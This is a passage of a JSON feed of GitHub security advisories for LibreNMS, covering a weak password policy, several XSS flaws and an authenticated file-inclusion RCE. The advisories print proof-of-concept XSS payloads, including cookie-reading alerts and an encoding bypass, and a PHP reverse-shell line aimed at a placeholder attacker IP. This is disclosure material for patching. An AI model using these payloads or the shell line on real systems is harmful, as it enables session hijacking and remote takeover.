Sheet","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-11-18T18:48:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9","https://nvd.nist.gov/vuln/detail/CVE-2025-65093","https://github.com/advisories/GHSA-6pmj-xjxp-p8g9"],"source_kind":"github","identifiers":["GHSA-6pmj-xjxp-p8g9","CVE-2025-65093"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-11-18T19:00:08.734Z","updated_at":"2026-09-03T00:04:45.110Z","epss_percentage":0.03663,"epss_percentile":0.88646,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cG1qLXhqeHAtcDhnOc4ABOqL","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02cG1qLXhqeHAtcDhnOc4ABOqL","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.11.0","vulnerable_version_range":"\u003c= 25.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cG1qLXhqeHAtcDhnOc4ABOqL/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01bXJmLWo4djYtZjQ1Z84ABOpY","url":"https://github.com/advisories/GHSA-5mrf-j8v6-f45g","title":"LibreNMS has Weak Password Policy","description":"## Summary\n\nA **Weak Password Policy** vulnerability was identified in the user management functionality of the _LibreNMS_ application. This vulnerability allows administrators to create accounts with extremely weak and predictable passwords, such as `12345678`. This exposes the platform to brute-force and credential stuffing attacks.\n\n---\n\n## Details\n\n**Vulnerable Component:** User creation / password definition\n\nThe application fails to enforce a strong password policy when creating new users. As a result, administrators can define trivial and well-known weak passwords, compromising the authentication security of the system.\n\n---\n\n## PoC\n\n1. Log in to the application using an **Administrator** account.\n    \n2. Navigate to the user management section:  \n      \n3. Create a new user account using the password `12345678`.\n    \n\n\u003cimg width=\"1103\" height=\"852\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a20d4226-9f86-46ee-a4e6-45be91bb6b7b\" /\u003e\n\n4. The application accepts the weak password without restrictions and creates the account successfully.\n    \n\u003cimg width=\"1359\" height=\"487\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9bec15bf-b38f-448b-8f98-acca5724e143\" /\u003e\n\n---\n\n## Impact\n\nWeak password policy vulnerabilities can have severe consequences, including:\n\n- Increased risk of brute-force and credential stuffing attacks\n    \n- Unauthorized access to user or administrative accounts\n    \n- Privilege escalation through compromised credentials\n    \n- Degradation of the overall security posture of the platform\n    \n\n---\n\n## Mitigation\n\n- Enforce a strong password policy (e.g., minimum of 12 characters with uppercase, lowercase, digits, and special characters).\n    \n- Block the use of commonly known weak passwords (e.g., `12345678`, `password`, `admin`, `qwerty`).","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-11-18T18:24:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g","https://nvd.nist.gov/vuln/detail/CVE-2025-65014","https://github.com/advisories/GHSA-5mrf-j8v6-f45g"],"source_kind":"github","identifiers":["GHSA-5mrf-j8v6-f45g","CVE-2025-65014"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-11-18T19:00:08.746Z","updated_at":"2026-09-03T00:04:50.212Z","epss_percentage":0.00254,"epss_percentile":0.16969,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01bXJmLWo4djYtZjQ1Z84ABOpY","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01bXJmLWo4djYtZjQ1Z84ABOpY","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.11.0","vulnerable_version_range":"\u003c 25.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01bXJmLWo4djYtZjQ1Z84ABOpY/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qOGNxLTdmNnAtMjU2eM4ABOpX","url":"https://github.com/advisories/GHSA-j8cq-7f6p-256x","title":"LibreNMS vulnerable to Reflected Cross-Site Scripting (XSS) in endpoint `/maps/nodeimage` parameter `Image Name`  ","description":"## Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was identified in the LibreNMS application at the `/maps/nodeimage` endpoint. The `Image Name` parameter is reflected in the HTTP response without proper output encoding or sanitization, allowing an attacker to craft a URL that, when visited by a victim, causes arbitrary JavaScript execution in the victim’s browser.\n\n## Details\n\n- **Vulnerable Endpoint:** `GET /maps/nodeimage`\n    \n- **Parameter:** `Image Name` (reflected in response)\n    \n- **Vulnerability type:** Reflected Cross-Site Scripting (XSS) — input is reflected in server response and executed in victim browser.\n    \n- **CWE:** CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting)\n    \n\n## Description\n\nThe application takes the value of the `Image Name` parameter from a request to `/maps/nodeimage` and includes it in the generated page or response without proper contextual encoding. Because the input is reflected immediately back to the client and parsed as HTML/JavaScript by the browser, an attacker can craft a URL containing a malicious script. If a victim (for example, an authenticated user or administrator) is tricked into visiting that URL, the injected script will execute in the victim’s browser context.\n\n## Proof of Concept (PoC)\n\nConstruct a request that includes the following payload in the `Image Name` parameter. The payload below should be used exactly as provided:\n\n```\n\u003cscript\u003ealert('PoC-XXS51')\u003c/script\u003e\n```\n\n## Steps to reproduce\n\n1. Authenticate as any user allowed to manage Node Images;\n    \n2. Navigate the endpoint '/maps/nodeimage' and click on \"New Image\". Choose any valide image and, on `Image Name` parameter, insert the payload above .\n\n\u003cimg width=\"804\" height=\"408\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e6de8fc5-80a3-4cc3-81c5-2435dec25372\" /\u003e\n\n    \n3. Observe the server response page; if vulnerable, the payload will be executed by the browser and an alert box with `PoC-XXS51` will appear.\n\n\u003cimg width=\"713\" height=\"589\" alt=\"image\" src=\"https://github.com/user-attachments/assets/202d602a-5f0b-4c7c-bb89-ffd1280c9e29\" /\u003e\n\n## Observed behavior\n\nThe supplied payload is reflected in the HTTP response and interpreted by the browser, resulting in immediate execution (demonstrated by an alert popup). This confirms the application does not perform appropriate output encoding for the `Image Name` parameter.\n\n## Impact\n\nReflected XSS can be used to:\n\n- Execute arbitrary JavaScript in the context of any user who visits the crafted link.\n    \n- Steal session cookies or authentication tokens (leading to session hijacking).\n    \n- Perform actions on behalf of the victim (CSRF-like actions executed via script).\n    \n- Phish users by manipulating the page UI, or exfiltrate sensitive information visible to the victim.\n    \n- Pivot to further attacks depending on application context and user privileges.\n   \n\n## References\n\n- CWE-79 — Cross-Site Scripting (XSS).\n    \n- OWASP XSS Prevention Cheat Sheet.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-11-18T18:21:28.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.2,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x","https://nvd.nist.gov/vuln/detail/CVE-2025-65013","https://github.com/advisories/GHSA-j8cq-7f6p-256x"],"source_kind":"github","identifiers":["GHSA-j8cq-7f6p-256x","CVE-2025-65013"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-11-18T19:00:08.746Z","updated_at":"2026-09-03T00:04:50.212Z","epss_percentage":0.00253,"epss_percentile":0.16912,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qOGNxLTdmNnAtMjU2eM4ABOpX","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qOGNxLTdmNnAtMjU2eM4ABOpX","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.11.0","vulnerable_version_range":"\u003c 25.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qOGNxLTdmNnAtMjU2eM4ABOpX/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02ZzJ2LTY2Y2gtNnhtaM4ABNgA","url":"https://github.com/advisories/GHSA-6g2v-66ch-6xmh","title":"LibreNMS alert-rules has a Cross-Site Scripting Vulnerability","description":"## Executive Summary\n\n**Product:** LibreNMS  \n**Vendor:** LibreNMS  \n**Vulnerability Type:** Cross-Site Scripting (XSS)  \n**CVSS Score:** 4.3 (AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L)  \n**Affected Version:** 25.8.0 (latest at time of discovery)  \n**POC File:** [Download POC](https://trendmicro-my.sharepoint.com/:u:/p/kholoud_altookhy/EQYQOiGddUtOtz6739YUFU4B5FkNob_TvKBYEA8P6lSRQw?e=lDOR5W)\n**Ticket:** ZDI-CAN-28105: LibreNMS Alert Rules Cross-Site Scripting Vulnerability\n\n## Vulnerability Details\n\n### Description\nTrend Micro's Zero Day Initiative has identified a Cross-Site Scripting vulnerability in LibreNMS. The vulnerability exists in the Alert Rules functionality where the alert rule name is not properly sanitized, allowing injection of HTML code.\n\n### Technical Details\n\n**Version Tested:** 25.8.0  \n**Installer File:** 25.8.0.tar.gz  \n**Download Link:** https://github.com/librenms/librenms/archive/refs/tags/25.8.0.tar.gz  \n**Platform:** N/A\n\n### Attack Vector\nWhen browsing to **Alerts \u003e Alert Rules** page, a LibreNMS admin can add and manage alert rules. The alert rule name field is vulnerable to XSS attacks through improper sanitization.\n\n## Root Cause Analysis\n\n### Vulnerable Request\nWhen creating or updating an alert rule, the following HTTP POST request is sent to `/ajax_form.php`:\n\n ```\nPOST /ajax_form.php HTTP/1.1\n...\n\n_token=9YjTntCuMIe2ujpumwqJQoENRXUhJzlDt33Xu7kx\u0026device_id=-1\u0026device_name=\u0026rule_id=\u0026type=alert-rules\u0026template_id=\u0026builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22equal%22%2C%22value%22%3A%2242%22%7D%5D%2C%22valid%22%3Atrue%7D\u0026name=%3Ci%3Efoo%3C%2Fi%3E\u0026builder_rule_0_filter=access_points.accesspoint_id\u0026builder_rule_0_operator=equal\u0026builder_rule_0_value_0=42\u0026severity=warning\u0026count=1\u0026delay=1m\u0026interval=5m\u0026recovery=on\u0026acknowledgement=on\u0026proc=\u0026notes=\u0026adv_query=\n```\n\n### Code Flow\n\n1. **Request Processing:** PHP script `includes/html/forms/alert-rules.inc.php` processes the request\n2. **Sanitization Attempt:** Calls `strip_tags()` to sanitize the `name` parameter\n3. **Database Operation:** Calls `dbUpdate()` or `dbInsert()` to save the rule\n\n### Bypass Technique\nThe sanitization can be bypassed using XML character references:\n\n```html\n\u0026lt;script\u003ealert(1)\u0026lt;/script\u003e\n```\n\n### Execution Path\n\n1. **Page Load:** Victim browses to Alerts \u003e Alert Rules page\n2. **Script Execution:** `includes/html/print-alert/rules.php` is called\n3. **Modal Inclusion:** Includes `includes/html/modal/alert_rule_list.inc.php` which returns HTML for modal window\n4. **Table Rendering:** Modal contains HTML table with all rules and inline JavaScript calling `bootgrid()` function\n5. **XSS Trigger:** The `bootgrid()` function (http://www.jquery-bootgrid.com/) rewrites table cells, decoding XML character references\n6. **Code Execution:** Browser interprets the decoded payload as HTML tags and executes the injected script\n\n## Proof of Concept\n\n### Usage\n```bash\npython3 poc.py client ip_addr -U \u003cusername\u003e -P \u003cpassword\u003e\n```\n\n### Optional Parameters\n- `-E [kvp|multipart]` - Specify HTTP request parameter encoding\n\n## Credit\n\n**Discovered by:** Simon Humbert of Trend Research, Trend Micro\n\n## About Zero Day Initiative (ZDI)\n\nEstablished by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.\n\n## References\n\n- **ZDI Website:** http://www.zerodayinitiative.com\n- **Disclosure Policy:** http://www.zerodayinitiative.com/advisories/disclosure_policy/","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-10-16T20:18:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-6g2v-66ch-6xmh","https://nvd.nist.gov/vuln/detail/CVE-2025-62412","https://github.com/librenms/librenms/commit/dccdf6769976a974d70f06a7ce8d5a846b29db6f","https://github.com/librenms/librenms/releases/tag/25.10.0","https://github.com/advisories/GHSA-6g2v-66ch-6xmh"],"source_kind":"github","identifiers":["GHSA-6g2v-66ch-6xmh","CVE-2025-62412"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-10-16T21:00:19.513Z","updated_at":"2026-09-03T00:05:03.725Z","epss_percentage":0.00258,"epss_percentile":0.17073,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02ZzJ2LTY2Y2gtNnhtaM4ABNgA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02ZzJ2LTY2Y2gtNnhtaM4ABNgA","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.10.0","vulnerable_version_range":"\u003c= 25.8.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02ZzJ2LTY2Y2gtNnhtaM4ABNgA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mcmM2LXB3Z3ItYzI4d84ABNfd","url":"https://github.com/advisories/GHSA-frc6-pwgr-c28w","title":"LibreNMS has a Stored XSS vulnerability in its Alert Transport name field","description":"### Summary\n\nLibreNMS \u003c= 25.8.0 contains a **Stored Cross-Site Scripting (XSS)** vulnerability in the Alert Transports management functionality. When an administrator creates a new Alert Transport, the value of the `Transport name` field is stored and later rendered in the **Transports** column of the **Alert Rules** page without proper input validation or output encoding. This leads to arbitrary JavaScript execution in the admin’s browser.\n\n### Details\n\n* **Injection point:** `Transport name` field in `/alert-transports`.\n* **Execution point:** **Transports** column in `/alert-rules`.\n* **Scope:** Only administrators can create Alert Transports, and only administrators can view the affected Alert Rules page. Therefore, both exploitation and impact are limited to admin users.\n\n### Steps to reproduce\n\n1. Log in with an administrator account.\n2. Navigate to:\n\n   ```\n   http://localhost:8000/alert-transports\n   ```\n3. Click **Create alert transport** and provide the following values:\n\n   * **Transport name:**\n\n     ```html\n     'onfocus='alert(1)' autofocus=\n     ```\n   * **Default Alert:** `ON`\n   * **Email:** `test@gmail.com` (or any valid email)\n   \n    Save the transport.\n   \n4. Navigate to ```http://localhost:8000/alert-rules```. A popup `alert(1)` is triggered, confirming that the payload executes.\n\u003cimg width=\"1829\" height=\"396\" alt=\"image\" src=\"https://github.com/user-attachments/assets/932ba17d-214d-4253-80b8-62539d1cfa28\" /\u003e\n\n### Impact\n\nOnly accounts with the admin role who access the **Alert Rules** page (`http://localhost:8000/alert-rules`) are affected.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-10-16T16:52:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-frc6-pwgr-c28w","https://github.com/librenms/librenms/commit/e1ead366239b57e88f9a06d4f7c213b1e2530cd8","https://github.com/librenms/librenms/releases/tag/25.10.0","https://nvd.nist.gov/vuln/detail/CVE-2025-62411","https://github.com/librenms/librenms/commit/706a77085f4d5964f7de9444208ef707e1f79450","https://github.com/advisories/GHSA-frc6-pwgr-c28w"],"source_kind":"github","identifiers":["GHSA-frc6-pwgr-c28w","CVE-2025-62411"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-10-16T17:00:07.460Z","updated_at":"2026-09-03T00:05:03.728Z","epss_percentage":0.11896,"epss_percentile":0.9561500000000001,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcmM2LXB3Z3ItYzI4d84ABNfd","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mcmM2LXB3Z3ItYzI4d84ABNfd","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.10.0","vulnerable_version_range":"\u003c 25.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcmM2LXB3Z3ItYzI4d84ABNfd/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04NnJnLThoYzgtdjgycM4ABNUy","url":"https://github.com/advisories/GHSA-86rg-8hc8-v82p","title":"LibreNMS is vulnerable to Reflected-XSS in `report_this` function","description":"### Summary\nReflected-XSS in `report_this` function in `librenms/includes/functions.php`\n\n### Details\nRecently, it was discovered that  the `report_this` function had improper filtering (`htmlentities` function was incorrectly used in a href environment), which caused the `project_issues` parameter to trigger an XSS vulnerability.\n\nThe Vulnerable Sink:\nhttps://github.com/librenms/librenms/blob/master/includes/functions.php#L444\n\n### PoC\nGET\n`project_issues=javascript:alert(document.cookie)`\n\n### Impact\nXSS vulnerabilities allow attackers to execute malicious scripts in users' browsers, enabling unauthorized access to sensitive data, session hijacking, or malware distribution.\n\n### Suggestion\nIt is recommended to filter dangerous protocols, e.g. `javascript:`/`file:`.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-10-13T22:11:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P","references":["https://github.com/librenms/librenms/security/advisories/GHSA-86rg-8hc8-v82p","https://nvd.nist.gov/vuln/detail/CVE-2025-62365","https://github.com/librenms/librenms/commit/30d3dd7e5f5e22a8c23c9db3ad90a731c005b008","https://github.com/advisories/GHSA-86rg-8hc8-v82p"],"source_kind":"github","identifiers":["GHSA-86rg-8hc8-v82p","CVE-2025-62365"],"repository_url":"https://github.com/librenms/librenms","blast_radius":1.6556649761518967,"created_at":"2025-10-14T01:00:08.839Z","updated_at":"2026-09-03T00:05:05.303Z","epss_percentage":0.00231,"epss_percentile":0.13841,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NnJnLThoYzgtdjgycM4ABNUy","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04NnJnLThoYzgtdjgycM4ABNUy","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.7.0","vulnerable_version_range":"\u003c= 25.6.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NnJnLThoYzgtdjgycM4ABNUy/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12eHE2LThjd20td2o5Oc4ABLL6","url":"https://github.com/advisories/GHSA-vxq6-8cwm-wj99","title":"LibreNMS allows stored XSS in Alert Template name field","description":"### Summary\n\nA stored Cross-Site Scripting (XSS) vulnerability exists in LibreNMS (\u003c= 25.6.0) in the Alert Template creation feature. This allows a user with the **admin role** to inject malicious JavaScript, which will be executed when the template is rendered, potentially compromising other admin accounts.\n\n---\n### Details\n\nIn the LibreNMS web UI, when a user with the **admin role** visits `/templates` and clicks **\"Create new alert template\"**, the **\"Template name\"** field fails to properly sanitize input. By inserting a payload like:\n\n```\n\u0026lt;script\u003ealert(document.cookie)\u0026lt;/script\u003e \n```\n\nand filling the other fields with arbitrary content (e.g., `test`), once the template is saved, the script is executed. This confirms that user input is stored and later rendered without proper output encoding.\n\nThis vulnerability can be exploited for session hijacking, data theft, or other malicious actions targeting other admin users.\n\n---\n### PoC\n\n1. Log in to LibreNMS using an account with the **admin role**.\n2. Navigate to: `http://localhost:8000/templates`.\n3. Click the **\"Create new alert template\"** button.\n4. Input the following into the **Template name** field:\n\n   ```\n   \u0026lt;script\u003ealert(document.cookie)\u0026lt;/script\u003e\n   ```\n5. Fill the remaining fields (`Template`, `Alert title`, `Recovery title`) with arbitrary content such as `test`.\n6. Click **\"Create template\"**.\n7. Upon saving, a JavaScript alert pops up, confirming the stored XSS is triggered.\n\u003cimg width=\"1574\" height=\"848\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bc482874-c47e-48e3-83b6-cb4a9dcf4a53\" /\u003e\n\n---\n### Impact\n\n **Type**: Stored Cross-Site Scripting (XSS)\n **Affected users**: Only accounts with the **admin role** who access the Alert Templates page (`http://localhost:8000/templates`) are affected.\n **Attackers need**: Authenticated admin-level access.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-08-18T22:25:29.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-vxq6-8cwm-wj99","https://nvd.nist.gov/vuln/detail/CVE-2025-55296","https://github.com/librenms/librenms/commit/8ade3d827d317f5ac4b336617aafff865f825958","https://github.com/advisories/GHSA-vxq6-8cwm-wj99"],"source_kind":"github","identifiers":["GHSA-vxq6-8cwm-wj99","CVE-2025-55296"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-08-18T23:08:53.174Z","updated_at":"2026-09-03T00:05:25.605Z","epss_percentage":0.11889,"epss_percentile":0.95658,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12eHE2LThjd20td2o5Oc4ABLL6","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12eHE2LThjd20td2o5Oc4ABLL6","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.8.0","vulnerable_version_range":"\u003c 25.8.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12eHE2LThjd20td2o5Oc4ABLL6/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ncTk2LTh3MzgtaGhqMs4ABKWN","url":"https://github.com/advisories/GHSA-gq96-8w38-hhj2","title":"LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE","description":"LibreNMS 25.6.0 contains an architectural vulnerability in the `ajax_form.php` endpoint that permits Remote File Inclusion based on user-controlled POST input. \n\nThe application directly uses the `type` parameter to dynamically include `.inc.php` files from the trusted path `includes/html/forms/`, without validation or allowlisting:\n\n```php\nif (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {\n    include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';\n}\n```\nThis pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.\n\n\u003e  This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.\n\n# Conditions for Exploitation\n\n- Attacker must be authenticated    \n- Attacker must control a file at `includes/html/forms/{type}.inc.php` (or symlink)        \n\n# Example Impact (RCE)\n\nIf a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the `librenms` user context:\n\n```php\n\u003c?php system('/bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/ATTACKER-IP/4444 0\u003e\u00261\"'); ?\u003e\n```\nhttps://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812\n\n\n---\n\n# Recommended Fix\n\n- Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames. \n- Avoid passing raw POST input into `include_once`.\n- Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-21T21:10:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2","https://github.com/librenms/librenms/pull/17990","https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81","https://github.com/librenms/librenms/releases/tag/25.7.0","https://nvd.nist.gov/vuln/detail/CVE-2025-54138","https://github.com/advisories/GHSA-gq96-8w38-hhj2"],"source_kind":"github","identifiers":["GHSA-gq96-8w38-hhj2","CVE-2025-54138"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-07-21T22:09:05.176Z","updated_at":"2026-09-03T00:05:33.029Z","epss_percentage":0.01028,"epss_percentile":0.60716,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ncTk2LTh3MzgtaGhqMs4ABKWN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ncTk2LTh3MzgtaGhqMs4ABKWN","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.7.0","vulnerable_version_range":"\u003c 25.7.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ncTk2LTh3MzgtaGhqMs4ABKWN/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oeHc1LTljYzUtY213Nc4ABIFz","url":"https://github.com/advisories/GHSA-hxw5-9cc5-cmw5","title":"LibreNMS stored Cross-site Scripting vulnerability in poller group name","description":"### LibreNMS v25.4.0 suffers from Stored Cross-Site Scripting (XSS) Vulnerability in the 'group name' parameter of the 'http://localhost/poller/groups' form. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.\n\n## ---------------------------------POC-----------------------------\nBefore Setting: Enable 'distributed_poller' in http://localhost/settings/poller/distributed\n1. Attacker creates a new poller group and injects the payload in the 'group name' parameter\n```\npayload: \u003cscript\u003ealert('XSS')\u003c/script\u003e\n```\n2. Victim navigates to the 'http://localhost/addhost' to add a new host\n3. The payload is executed\n\ncode sink:\nhttps://github.com/librenms/librenms/blob/25.4.0/includes/html/pages/addhost.inc.php#L284","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-05-19T16:22:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":2.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P","references":["https://github.com/librenms/librenms/security/advisories/GHSA-hxw5-9cc5-cmw5","https://nvd.nist.gov/vuln/detail/CVE-2025-47931","https://github.com/librenms/librenms/pull/17603","https://github.com/librenms/librenms/commit/88fe1a7abdb500d9a2d4c45f9872df54c9ff8062","https://github.com/librenms/librenms/blob/25.4.0/includes/html/pages/addhost.inc.php#L284","https://github.com/advisories/GHSA-hxw5-9cc5-cmw5"],"source_kind":"github","identifiers":["GHSA-hxw5-9cc5-cmw5","CVE-2025-47931"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.6321629908943606,"created_at":"2025-05-19T17:08:03.457Z","updated_at":"2026-09-03T00:05:52.489Z","epss_percentage":0.119,"epss_percentile":0.95777,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oeHc1LTljYzUtY213Nc4ABIFz","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oeHc1LTljYzUtY213Nc4ABIFz","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.5.0","vulnerable_version_range":"\u003c 25.5.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oeHc1LTljYzUtY213Nc4ABIFz/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nODR4LWc5NmctcmNqY84ABDb7","url":"https://github.com/advisories/GHSA-g84x-g96g-rcjc","title":"Librenms has a reflected XSS on error alert","description":"XSS on the parameters:`/addhost` -\u003e param: community\n\n\nof Librenms versions 24.10.1 ([https://github.com/librenms/librenms](https://github.com/librenms/librenms)) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.\n\n\n**Proof of Concept:**\n1. Navigate to the /addhost path.\n2. Fill in all required fields.\n3. In the Community field, enter the following payload: `\"\u003e\u003cimg src=a onerror=\"alert(1)\"\u003e`.\n![image](https://github.com/user-attachments/assets/025a7692-e730-4e3b-bca7-761ed2a60cf7)\n\n4. Submit the form to save changes.\n5 The script will execute when the error alert \"No reply with community + payload\" appears.\n![image](https://github.com/user-attachments/assets/4663e24a-4ff7-42f4-9c3d-3c5b5bf34017)\n\n\n\n**Impact:**\n\nExecution of Malicious 